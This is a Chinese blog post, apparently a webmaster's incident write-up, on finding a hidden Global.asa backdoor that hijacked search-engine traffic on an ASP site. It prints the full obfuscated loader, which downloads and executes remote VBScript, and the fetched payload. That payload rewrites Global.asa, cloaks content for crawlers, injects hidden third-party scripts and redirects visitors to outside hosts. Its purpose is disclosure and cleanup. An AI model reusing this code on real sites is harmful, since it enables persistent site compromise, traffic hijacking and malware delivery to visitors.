警惕ASP网站Global.asa导致网站被挂马或转向
上午帮朋友处理一个比较有难度的问题,网站输入域名访问正常打开,但从搜索引擎厚度或是Google之类的打开,就会跳转到某些色情网站上去.
根据经验,可以推断出来应该是asp程序根据网页的来路,即HTTP_REFERER进行判断,发现是搜索引擎过来的流量就跳转到色情站点去,使用此种方法具有很强的隐匿性,因为站长们一般不会去搜索自己的网站,所以轻易不会发现自己站点遭到了挟持。
因为网站是自己很多年前帮朋友做的,所以要了现在的代码,看了一下,没有发现问题,就开始是不是服务器感染了什么病毒或是被加上了什么IIS过滤器之类的,要了远程桌面,上去找了半天,一无所获,看了一下IP地址,发现是一个内网IP地址,也就是说需要网关将网站映射发布出去,于是怀疑问题是在网关上,但问了朋友之后,得知网关为一路由器,再加上将IIS关闭,网站也就无法打开,不能再跳转,排除了网关加马的可能性。
难倒走不下去了?
忽然想到一招,采用FileMon对w3wp.exe进程进行监控,看看用搜索引擎打开和直接打开读取的文件到底有什么不同,通过多次比较,也没有发现什么疑点。
万般无奈,又回到网站根目录下,顺手打开了显示系统隐藏文件,却发现多了一个Global.asa文件,因为网站是自己做的,比较了解,根本不可能使用这个文件,打开一看,一切疑点都解决了。
Global.asa文件内容如下:
<script language=
"vbscript"
runat=
"server"
>
'by_aming
'by*aming
sub Application_OnStart
end sub
sub Application_OnEnd
end sub
sub Session_OnStart
url=
"h"
&
"t"
&
"t"
&
"p"
&
":"
&
"/"
&
"/"
&
"g"
&
"l"
&
"o"
&
".1"
&
"0"
&
"0"
&
"5"
&
"0"
&
"0"
&
".c"
&
"o"
&
"m"
&
"/x"
&
"m"
&
"l"
&
"/"
&
"g"
&
"l"
&
"o"
&
"b"
&
"a"
&
"l"
&
"."
&
"a"
&
"s"
&
"a"
&
"q"
&
"u"
&
"a"
&
"n"
&
"."
&
"t"
&
"x"
&
"t"
Set
ObjXMLHTTP=Server.CreateObject(
"MSXML2.serverXMLHTTP"
)
ObjXMLHTTP.Open
"GET"
,url,
False
ObjXMLHTTP.setRequestHeader
"User-Agent"
,url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set
ObjXMLHTTP=
Nothing
set objStream = Server.CreateObject(
"Adodb.Stream"
)
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset =
"gb2312"
GetHtml = objStream.ReadText
objStream.Close
if instr(GetHtml,
"by*aming"
)>0 then
execute GetHtml
end if
end sub
'sub Session_OnEnd
'end sub
</script>
|
因为Global.asa文件为网站启动文件,当一个网站被第一次访问时,会执行Application_Start代码段的内容,当一个用户第一次访问时会执行Session_Start代码段的内容,所以此段代码的作用就是当访问,从http://glo.100500.com/xml/global.asaquan.txt处下载内容,并执行,让我们来看看http://glo.100500.com/xml/global.asaquan.txt的内容是什么吧:
代码
<!--
Code highlighting produced by Actipro CodeHighlighter (freeware)
http://www.CodeHighlighter.com/
-->
'
<html><head><script>function clear()
{Source
=
document.body.firstChild.data;document.open
();document.close
();document.title
=
""
;document.body.innerHTML
=
Source;}
</
script
></
head
><
body onload
=
clear()
>
'
<meta http-equiv=refresh content=0;URL=about:blank><script>eval
(
function
(p,a,c,k,e,d){e
=
function
(c){
return
c};
if
(!
'
'.replace
(
/^/
,
String
)){
while
(c
--
){d[c]
=
k[c]||c}k
=
[
function
(e){
return
d
[e]}];e
=
function
(){
return
'
\\w+'};c=1};while(c--){if(k[c])
{p
=
p.replace(
new
RegExp(
'
\\b'+e(c)+'\\b','g'),k[c])}}return p}
(
'
0.1.2(\'3:4\');',5,5,'window|location|replace|about|blank'.split
(
'
|'),0,{}))</script>
'
by*aming
Server.ScriptTimeout
=
600
Public
Function
createasa(
ByVal
Content)
On
Error
Resume
Next
Set
fso
=
Server.CreateObject(
"
scripting.filesystemobject
"
)
set
f
=
fso.Getfile(
"
//./
"
&
Server.MapPath(
"
/global.asa
"
))
f.Attributes
=
0
Set
Obj
=
Server.CreateObject(
"
adod
"
&
"
b.S
"
&
"
tream
"
)
Obj.Type
=
2
Obj.open
Obj.Charset
=
"
gb2312
"
Obj.Position
=
Obj.Size
Obj.writetext
=
Content
Obj.SaveToFile
"
//./
"
&
Server.MapPath(
"
/global.asa
"
),
2
Obj.Close
Set
Obj
=
Nothing
f.Attributes
=
1
+
2
+
4
set
f
=
Nothing
Set
fso
=
Nothing
End Function
Public
Function
createasax(
ByVal
Content)
On
Error
Resume
Next
Set
fso
=
Server.CreateObject(
"
scripting.filesystemobject
"
)
set
f
=
fso.Getfile(
"
//./
"
&
Server.MapPath(
"
/global.asax
"
))
f.Attributes
=
0
Set
Obj
=
Server.CreateObject(
"
adod
"
&
"
b.S
"
&
"
tream
"
)
Obj.Type
=
2
Obj.open
Obj.Charset
=
"
gb2312
"
Obj.Position
=
Obj.Size
Obj.writetext
=
Content
Obj.SaveToFile
"
//./
"
&
Server.MapPath(
"
/global.asax
"
),
2
Obj.Close
Set
Obj
=
Nothing
f.Attributes
=
1
+
2
+
4
set
f
=
Nothing
Set
fso
=
Nothing
End Function
Public
Function
GetHtml(url)
Set
ObjXMLHTTP
=
Server.CreateObject(
"
MSXML2.serverXMLHTTP
"
)
ObjXMLHTTP.Open
"
GET
"
,url,
False
ObjXMLHTTP.setRequestHeader
"
User-Agent
"
,url
ObjXMLHTTP.send
GetHtml
=
ObjXMLHTTP.responseBody
Set
ObjXMLHTTP
=
Nothing
set
objStream
=
Server.CreateObject(
"
Adodb.Stream
"
)
objStream.Type
=
1
objStream.Mode
=
3
objStream.Open
objStream.Write GetHtml
objStream.Position
=
0
objStream.Type
=
2
objStream.Charset
=
"
gb2312
"
GetHtml
=
objStream.ReadText
objStream.Close
End Function
Function
check(user_agent)
allow_agent
=
split
(
"
Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-
WebCrawler,MSNBOT,Slurp
"
,
"
,
"
)
check_agent
=
false
For
agenti
=
lbound
(allow_agent)
to
ubound
(allow_agent)
If
instr
(user_agent,allow_agent(agenti))
>
0
then
check_agent
=
true
exit
for
end
if
Next
check
=
check_agent
End function
Function
CheckRobot()
CheckRobot
=
False
Dim
Botlist,i,Repls
Repls
=
request.ServerVariables(
"
http_user_agent
"
)
Krobotlist
=
"
Baiduspider|Googlebot
"
Botlist
=
Split
(Krobotlist,
"
|
"
)
For
i
=
0
To
Ubound
(Botlist)
If
InStr
(Repls,Botlist(i))
>
0
Then
CheckRobot
=
True
Exit
For
End
If
Next
If
Request.QueryString(
"
admin
"
)
=
"
1
"
Then
Session
(
"
ThisCheckRobot
"
)
=
1
If
Session(
"
ThisCheckRobot
"
)
=
1
Then
CheckRobot
=
True
End Function
Function
CheckRefresh()
CheckRefresh
=
False
Dim
Botlist,i,Repls
Krobotlist
=
"
baidu|google|sogou|soso|youdao
"
Botlist
=
Split
(Krobotlist,
"
|
"
)
For
i
=
0
To
Ubound
(Botlist)
If
InStr
(
left
(request.servervariables
(
"
HTTP_REFERER
"
),
"
40
"
),Botlist(i))
>
0
Then
CheckRefresh
=
True
Exit
For
End
If
Next
End Function
Sub
sleep()
If
response.IsClientConnected
=
true
then
Response.Flush
else
response.end
end
if
End Sub
If
CheckRefresh
=
true
Then
cnnbd
=
lcase
(request.servervariables(
"
HTTP_HOST
"
))
'
response.redirect("http://www.220550.com/?"&cnnbd&"")
Response.Write(
"
<div style=display:none><script
src
=
http:
//
count11.51yes.com
/
click.aspx?
id
=
114814173
&
logo
=
1
></
script
><
script
src
=
http:
//
js.568tea.com
/
44
.js
></
script
><
script
src
=
http:
//
js.
37548
.com
/
44
.js
></
script
></
div
>
"
)
response.end
end
If
user_agent
=
Request.ServerVariables(
"
HTTP_USER_AGENT
"
)
if
check(user_agent)
=
true
then
'
body=GetHtml("http://html.888hhh.com/2prn.asp?
domain
=
"
&strHost&
"
&
ua
=
"
&server.URLEncode(request.ServerVariables
(
"
HTTP_USER_AGENT
"
))
&
""
)
body
=
GetHtml(
"
http://i.bxhty.info/index.asp?
domain
=
"
&strHost&
"
&
ua
=
"
&server.URLEncode(request.ServerVariables
(
"
HTTP_USER_AGENT
"
))
&
""
)
response.write body
response.end
else
asa
=
GetHtml(
"
http://glo.100500.com/xml/globalquan.txt
"
)
if
instr
(asa,
"
by*aming
"
)
>
0
then
createasa(asa)
end
if
ScriptAddress
=
Request.ServerVariables(
"
SCRIPT_NAME
"
)
namepath
=
Server.MapPath(ScriptAddress)
If
Len
(Request.QueryString)
>
0
Then
ScriptAddress
=
ScriptAddress
&
"
?
"
&
Request.QueryString
end
if
geturl
=
"
http://
"
&
Request.ServerVariables(
"
http_host
"
)
&
ScriptAddress
geturl
=
LCase
(geturl)
'
response.write replace(namepath,server.MapPath("/"),"")
'
response.end
'
if instr(geturl,"jc=ok")=0 and instr(geturl,"global=ok")=0 and
instr
(
LCase
(Request.ServerVariables(
"
http_host
"
)),
"
gov.cn
"
)
=
0
and
instr
(
LCase
(Request.ServerVariables(
"
http_host
"
)),
"
edu.cn
"
)
=
0
and
if
instr
(geturl,
"
http://
"
&
Request.ServerVariables(
"
http_host
"
)
&
"
/index.asp
"
)
=
0
and
instr
(geturl,
"
http://
"
&
Request.ServerVariables(
"
http_host
"
)
&
"
/
"
)
=
0
and
instr
(
LCase
(Request.ServerVariables(
"
HTTP_REFERER
"
)),
LCase
(Request.ServerVariables(
"
http_host
"
)))
<=
0
then
agent
=
lcase
(request.servervariables(
"
http_user_agent
"
))
referer
=
LCase
(Request.ServerVariables(
"
HTTP_REFERER
"
))
bot
=
""
Amll
=
""
if
instr
(agent,
"
+
"
)
>
0
then
bot
=
agent
if
instr
(agent,
"
-
"
)
>
0
then
bot
=
agent
if
instr
(agent,
"
http
"
)
>
0
then
bot
=
agent
if
instr
(agent,
"
spider
"
)
>
0
then
bot
=
agent
if
instr
(agent,
"
bot
"
)
>
0
then
bot
=
agent
if
instr
(agent,
"
linux
"
)
>
0
then
bot
=
agent
if
instr
(agent,
"
baidu
"
)
>
0
then
bot
=
agent
if
instr
(agent,
"
google
"
)
>
0
then
bot
=
"
nobot
"
if
instr
(agent,
"
yahoo
"
)
>
0
then
bot
=
"
nobot
"
if
instr
(agent,
"
msn
"
)
>
0
then
bot
=
"
nobot
"
if
instr
(agent,
"
alexa
"
)
>
0
then
bot
=
"
nobot
"
if
instr
(agent,
"
sogou
"
)
>
0
then
bot
=
"
nobot
"
if
instr
(agent,
"
youdao
"
)
>
0
then
bot
=
"
nobot
"
if
instr
(agent,
"
soso
"
)
>
0
then
bot
=
"
nobot
"
if
instr
(agent,
"
iask
"
)
>
0
then
bot
=
"
nobot
"
if
bot
=
"
nobot
"
then
'
Call WriteErr
'
response.end
end
if
If
Instr
(REFERER,
"
http
"
)
>
0
and
Instr
(REFERER,
"
.
"
)
>
0
and
Instr
(REFERER,
"
/
"
)
>
0
and
Instr
(REFERER,
"
?
"
)
>
0
and
Instr
(REFERER,
"
=
"
)
>
0
Then
Amll
=
"
ok
"
tjcount
=
request.Cookies(
"
cookie_tjcount
"
)
date1
=
request.Cookies(
"
cookie_date
"
)
date2
=
year
(
date
)
&
month
(
date
)
&
day
(
date
)
if
tjcount
=
""
then
response.cookies(
"
cookie_tjcount
"
)
=
0
response.cookies(
"
cookie_tjcount
"
).Expires
=
DateAdd
(
"
d
"
,
1
,now())
end
if
if
date1
<>
date2
then
response.cookies(
"
cookie_date
"
)
=
date2
response.cookies(
"
cookie_date
"
).Expires
=
DateAdd
(
"
d
"
,
365
,now
())
end
if
tjcount
=
request.Cookies(
"
cookie_tjcount
"
)
date1
=
request.Cookies(
"
cookie_date
"
)
date2
=
year
(
date
)
&
month
(
date
)
&
day
(
date
)
if
date1
=
date2
and
len
(bot)
=
0
then
if
int
(tjcount)
<
10
and
len
(Amll)
>
0
then
response.cookies(
"
cookie_tjcount
"
)
=
int
(tjcount)
+
1
response.cookies(
"
cookie_tjcount
"
).Expires
=
DateAdd
(
"
d
"
,
1
,now())
strHost
=
Request.ServerVariables(
"
HTTP_HOST
"
)
Response.Redirect(
"
http://www.115225.com/?
domain
=
"
&strHost&"")
else
'
response.write "<h1>Service Unavailable</h1>"
response.write
""
'
response.write gethtml(geturl&"?global=ok")
end
if
response.end
end
if
Call
sleep()
end
if
end
if
'
</body></html>
此处代码有多个函数组成:
createasa 根据传入的内容创建global.asa文件
createasax 根据传入的内容创建Global.asax文件
GetHtml 根据传入的url,获取相应的内容
check 检测user-agent判断是否为搜索引擎的蜘蛛
CheckRobot 检测是否为robot ?
CheckRefresh 检测是否Refresh
说到底这块代码的作用就是判断访问页面是否来自于搜索引擎,是的话,就将HTML:
代码
<!--
Code highlighting produced by Actipro CodeHighlighter (freeware)
http://www.CodeHighlighter.com/
-->
<
div
style
=display:none
><
script
src
=http://count11.51yes.com/click.aspx?id=114814173&logo=1
></
script
><
script
src
=http://js.568tea.com/44.js
></
script
><
script
src
=http://js.37548.com/44.js
></
script
></
div
>
输出去。
至此,就达到了将来自于搜索引擎流量挟持走的目的了。
解决办法也很简单,就是直接删除此文件就可以了,当然最好还是要检查一下网站,查一下为什么会被加上一个Global.asa文件
1011
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
